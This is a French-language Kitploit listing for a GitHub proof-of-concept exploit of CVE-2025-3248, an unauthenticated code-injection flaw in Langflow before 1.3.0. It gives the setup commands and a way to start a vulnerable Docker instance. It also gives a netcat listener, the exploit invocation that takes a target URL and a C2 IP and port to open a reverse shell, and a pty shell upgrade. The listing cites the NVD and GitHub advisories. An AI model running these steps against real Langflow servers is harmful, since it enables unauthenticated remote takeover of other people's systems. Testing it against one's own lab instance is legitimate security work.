Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3248 — PoC pour obtenir une RCE dans les versions de Langflow <1.3.0 | Kitploit
Outils/GitHubGitHub/wand3rlust/cve-2025-3248
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

PoC pour obtenir une RCE dans les versions de Langflow <1.3.0

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-3248

Introduction

Les versions de Langflow antérieures à 1.3.0 sont vulnérables à une injection de code non authentifiée dans le point de terminaison /api/v1/validate/code via la fonction Python exec(). Cet exploit établit une connexion reverse shell en abusant de cette vulnérabilité.

Utilisation

Configuration

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

Application vulnérable

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

Exécution

root@kitploit:~
# Terminal 1
nc -nvlp <C2_PORT>

# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

Par exemple : python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

REMARQUE : Pour passer le shell en TTY, exécutez la commande ci-dessous après avoir obtenu le shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Démo

Démo

Références

  • Avis de sécurité : https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub : https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • Exploit original : https://www.exploit-db.com/exploits/52262
Télécharger l’outil